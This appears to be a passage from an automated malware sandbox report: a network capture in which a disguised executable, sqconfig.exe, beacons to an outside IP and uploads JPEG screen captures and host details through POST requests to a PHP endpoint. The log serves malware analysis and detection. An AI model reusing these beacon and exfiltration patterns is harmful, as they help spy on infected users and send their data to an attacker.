                                                                  15192.168.2.34977491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:53.874377966 CEST7504OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----a925bc230fdbeec72a266ea97d6eb24e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86299
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:52:53.874458075 CEST7504OUTData Raw: 2d 2d 2d 2d 2d 2d 61 39 32 35 62 63 32 33 30 66 64 62 65 65 63 37 32 61 32 36 36 65 61 39 37 64 36 65 62 32 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------a925bc230fdbeec72a266ea97d6eb24eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:52:53.874629021 CEST7514OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:52:53.874737978 CEST7517OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:52:54.007759094 CEST7520OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:52:54.007857084 CEST7523OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:52:54.007884026 CEST7536OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:52:54.008199930 CEST7537OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:52:54.008235931 CEST7543OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:52:54.138937950 CEST7577OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:52:54.139023066 CEST7580OUTData Raw: c4 2d 2d 36 8a 2e 03 a9 45 30 75 a7 53 13 1d 9a 33 4d a5 a6 21 73 40 34 de 69 68 01 d9 a3 34 cc d2 d3 b8 ac 3f 34 6e a6 e6 93 34 5c 2c 3f 34 03 4c cd 00 d1 70 b0 fc d2 ee a6 52 13 45 c2 c4 9b a9 33 4c cd 19 a2 e1 61 fb a8 2d 4c cd 19 a2 e1 61 d9
                                                                  Data Ascii: --6.E0uS3M!s@4ih4?4n4\,?4LpRE3La-La(Xq4nh&4gnh14IM&i\vM&i+Fi.4;h4M!4\vLsHjnUS{I@=h4f4Z;QHRisQf5W&44ah4J@:3LE:Z(
                                                                  Sep 30, 2021 23:52:54.323667049 CEST7591INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:54 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Sep 30, 2021 23:52:54.327545881 CEST7592OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:54.529727936 CEST7592INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:54 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  150192.168.2.34998591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:42.033910990 CEST17832OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:42.034087896 CEST17832OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:42.034440041 CEST17842OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:42.034651041 CEST17845OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:42.165718079 CEST17870OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:42.294982910 CEST17881OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:42.295345068 CEST17902OUTData Raw: 2a 9b 69 04 09 3c 20 05 67 42 37 64 ee 63 b4 e4 b1 f5 aa da 46 a5 a4 69 5e 19 d2 f5 66 3a 94 29 67 ae cf 3d a5 b4 7b 25 69 48 86 12 12 49 72 9b 54 f0 09 08 78 27 8a 9f 6c ed 7f eb 57 61 fb 25 7f eb a2 b9 ca ae 8b aa b6 96 75 55 d2 ef 8e 9c 01 26
                                                                  Data Ascii: *i< gB7dcFi^f:)g={%iHIrTx'lWa%uU&[^I'gnSf%aH[V3_n].D%e%p7)Qb:~v'hbe96F<|goN)y+_ok_Gcy4C.Qbb/<#5.
                                                                  Sep 30, 2021 23:53:42.295418024 CEST17913OUTData Raw: 8c ed 20 82 30 32 72 00 19 38 ab 30 f8 46 e2 ea fa ca 1b 6d 4b 4f 9a d6 f1 26 78 ef 90 cb e4 8f 29 0b c8 18 14 0e 08 03 38 d9 ce 46 32 0d 67 52 34 aa 59 cf a6 ab fa f9 15 17 38 df 97 d0 ec f4 4f 8d fa c5 aa f9 3a cd 94 37 f1 b0 c3 4b 09 f2 25 39
                                                                  Data Ascii: 02r80FmKO&x)8F2gR4Y8O:7K%9q?>3_^6b:[f+{;[st,J].W$r3;=SO%V2puO9s<y3k6^YQnwc9W7#oSlo&
                                                                  Sep 30, 2021 23:53:42.509637117 CEST17918OUTData Raw: 08 d5 f7 78 73 44 66 b2 60 f9 0d 77 10 da 44 ae ab f7 9f 3f 34 62 37 f6 2c 47 6c 0f 4b d3 bf b7 e4 d2 ee c1 d5 1a 49 44 d1 6d 61 a9 23 6d 5d b2 64 64 3f 19 f9 78 ef 8f 6a ee fc 3e 2e 57 43 b6 17 72 19 27 f9 b7 31 90 49 9f 98 e3 e6 04 e7 8c 77 ae
                                                                  Data Ascii: xsDf`wD?4b7,GlKIDma#m]dd?xj>.WCr'1Iw*XN]jqGIIw[?`-ta(M|!_g}/Zhj|r%|>I;(>$Sq^.i^eGoFu
                                                                  Sep 30, 2021 23:53:42.509740114 CEST17918OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 2d 2d 0d 0a
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912--
                                                                  Sep 30, 2021 23:53:42.710318089 CEST17919INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:42 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  151192.168.2.34998691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:42.510318995 CEST17918OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:42.694713116 CEST17919INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:42 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  152192.168.2.34998791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:43.858612061 CEST17920OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:44.053958893 CEST17934INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:43 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  153192.168.2.34998891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:44.009100914 CEST17920OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:44.009313107 CEST17921OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:44.009686947 CEST17931OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:44.009953976 CEST17933OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:44.143867016 CEST17947OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:44.143939018 CEST17956OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:44.143960953 CEST17959OUTData Raw: df 3e 5c b8 f6 35 a1 8a 70 e3 bd 3f 69 35 b3 0f 67 07 ba 30 a5 f0 cc c3 94 60 d5 4e 4d 0e f2 31 fe a8 91 ed 5d 62 96 07 ad 4a 25 71 de ad 62 aa 2f 30 fa bc 1e cc e1 1e ca 78 fe f4 6c 3f 0a 8c a3 2f 63 5e 82 5d 58 7c f1 a9 fc 2a 36 b4 b2 9f ef c0
                                                                  Data Ascii: >\5p?i5g0`NM1]bJ%qb/0xl?/c^]X|*6ZktK7Y2z$l%Jifv#nS09*U**l:(VfgyQf*n=;WJZ+voWU%2#_;TPFye-'i"m RSWL'f
                                                                  Sep 30, 2021 23:53:44.279876947 CEST17994OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:44.279973984 CEST17996OUTData Raw: c4 2d 2d 36 8a 2e 03 a9 45 30 75 a7 53 13 1d 9a 33 4d a5 a6 21 73 40 34 de 69 68 01 d9 a3 34 cc d2 d3 b8 ac 3f 34 6e a6 e6 93 34 5c 2c 3f 34 03 4c cd 00 d1 70 b0 fc d2 ee a6 52 13 45 c2 c4 9b a9 33 4c cd 19 a2 e1 61 fb a8 2d 4c cd 19 a2 e1 61 d9
                                                                  Data Ascii: --6.E0uS3M!s@4ih4?4n4\,?4LpRE3La-La(Xq4nh&4gnh14IM&i\vM&i+Fi.4;h4M!4\vLsHjnUS{I@=h4f4Z;QHRisQf5W&44ah4J@:3LE:Z(
                                                                  Sep 30, 2021 23:53:44.280445099 CEST18006OUTData Raw: 14 ae 3b 0e 26 90 9a 6e 68 cd 17 1d 87 66 92 9a 4d 19 a4 3b 0b 47 34 94 51 70 0c d1 49 49 48 63 a8 a6 d2 1a 41 61 c4 d2 66 92 82 68 b8 c5 26 92 8c d1 48 02 8a 33 45 00 2d 14 99 a3 34 ee 03 a8 a6 d1 9a 04 3e 8a 6e 69 73 4c 02 8a 29 bd e8 01 d4 52
                                                                  Data Ascii: ;&nhfM;G4QpIIHcAafh&H3E-4>nisL)RPi2)(,-E&isLEz)o3pDHBu)458mt1OyL/]B+:b9WCQk~6'f$aPpIozkn.n.#f
                                                                  Sep 30, 2021 23:53:44.464596987 CEST18008INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:44 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  154192.168.2.34998991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:44.296700954 CEST18007OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:44.492404938 CEST18008INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:44 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  155192.168.2.34999091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:44.747339964 CEST18009OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:44.993244886 CEST18048INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:44 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  156192.168.2.34999191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:44.831301928 CEST18009OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:44.831386089 CEST18010OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:44.831572056 CEST18020OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
